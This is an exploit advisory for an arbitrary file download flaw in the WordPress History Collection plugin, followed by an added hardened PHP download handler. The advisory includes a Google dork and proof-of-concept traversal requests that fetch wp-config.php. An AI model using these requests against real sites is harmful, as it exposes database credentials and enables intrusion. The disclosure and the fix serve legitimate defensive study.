WordPress Plugin History Collection 1.1.1 – Arbitrary File Download

  • Author: Kuroi'SH
    Date: 2015-06-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/37254/
  • # Exploit Title: WordPress History Collection <=1.1.1 Arbitrary File Download
    # Google Dork: inurl:plugins/history-collection
    # Date: 10/06/2015
    # Exploit Author: Kuroi'SH
    # Software Link: https://wordpress.org/plugins/history-collection/
    # Version: <=1.1.1
    # Tested on: Linux
    
    I-Description:
    The WordPress History Collection plugin contains a file called download.php
    that does not filter the var GET parameter. It then uses this value to
    force the download of a file, so a value containing ../ sequences returns
    files from outside the plugin directory.
    (download.php, line 44):
    header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );

    II-Proof of concept:
    http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
    http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
    php -r "echo @file_get_contents('http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php');"
    
    Greetz:
    Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
    MuhmadEmad, redsm0ke
    By Kuroi'SH
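
A hardened form of the download handler described above, as an added example that is not the plugin's own code or a vendor patch. It assumes downloadable files live in one dedicated directory; HC_DOWNLOAD_DIR and hc_resolve_download() are hypothetical names.

```php
<?php
// Added example, not the plugin's code. Assumption: every downloadable
// file lives under one dedicated directory (HC_DOWNLOAD_DIR, hypothetical).
define('HC_DOWNLOAD_DIR', __DIR__ . '/files');

/**
 * Map the user-supplied name to a real file inside $baseDir,
 * or return null when the request must be refused.
 */
function hc_resolve_download(string $baseDir, string $requested): ?string
{
    // Refuse empty input and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ../ sequences and follows symlinks;
    // it returns false when the target does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check: the canonical path must start with "<base>/".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Only accept a scalar string for ?var= (arrays such as var[]=x are refused).
$var  = isset($_GET['var']) && is_string($_GET['var']) ? $_GET['var'] : '';
$file = hc_resolve_download(HC_DOWNLOAD_DIR, $var);
if ($file === null) {
    http_response_code(404);
    exit;
}

// Strip double quotes so the file name cannot break out of the header value.
$name = str_replace('"', '', basename($file));
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($file));
readfile($file);
```

With this check, var=../../../wp-config.php resolves to a path outside HC_DOWNLOAD_DIR and is answered with a 404 instead of the file contents.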